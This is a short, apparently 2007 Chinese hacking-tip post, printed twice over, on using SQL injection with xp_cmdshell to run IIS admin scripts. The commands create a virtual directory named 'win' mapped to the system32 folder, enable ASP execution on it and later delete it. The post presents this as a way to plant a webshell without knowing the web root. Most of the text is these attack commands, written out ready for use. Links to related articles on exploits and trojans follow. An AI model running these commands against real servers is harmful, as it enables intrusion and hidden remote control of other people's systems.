sql注入建立虛擬目錄
更新時(shí)間:2007年02月09日 00:00:00 作者:
sql注入建立虛擬目錄,免得找web絕對(duì)路徑
----------------------------------------------------------------
我們很多情況下都遇到sql注入可以列目錄和運(yùn)行命令,但是卻很不容易找到web所在目錄,也就不好得到一個(gè)webshell,這一招不錯(cuò):
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虛擬目錄win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
讓win句有解析asp腳本權(quán)限
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/"
刪除虛擬目錄。
找不到web絕對(duì)路徑的一種解決辦法,
http://xxx.com/win
403錯(cuò)誤,表示虛擬目錄建好了。。。
----------------------------------------------------------------
我們很多情況下都遇到sql注入可以列目錄和運(yùn)行命令,但是卻很不容易找到web所在目錄,也就不好得到一個(gè)webshell,這一招不錯(cuò):
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虛擬目錄win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
讓win句有解析asp腳本權(quán)限
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/"
刪除虛擬目錄。
找不到web絕對(duì)路徑的一種解決辦法,
http://xxx.com/win
403錯(cuò)誤,表示虛擬目錄建好了。。。
相關(guān)文章
專(zhuān)家觀點(diǎn):破解MD5和SHA-1不意味密碼破解(圖)
破解MD5和SHA-1不意味密碼破解2007-01-01默認(rèn)Samba版本在RedHat 9上的溢出獲取root演示
默認(rèn)Samba版本在RedHat 9上的溢出獲取root演示...2007-01-01特絡(luò)伊木馬如何利用文件關(guān)聯(lián)和設(shè)置名
特絡(luò)伊木馬如何利用文件關(guān)聯(lián)和設(shè)置名...2007-01-01河南移動(dòng)網(wǎng)絡(luò)客服系統(tǒng)驗(yàn)證碼的缺陷分析和利用!
河南移動(dòng)網(wǎng)絡(luò)客服系統(tǒng)驗(yàn)證碼的缺陷分析和利用!...2007-01-01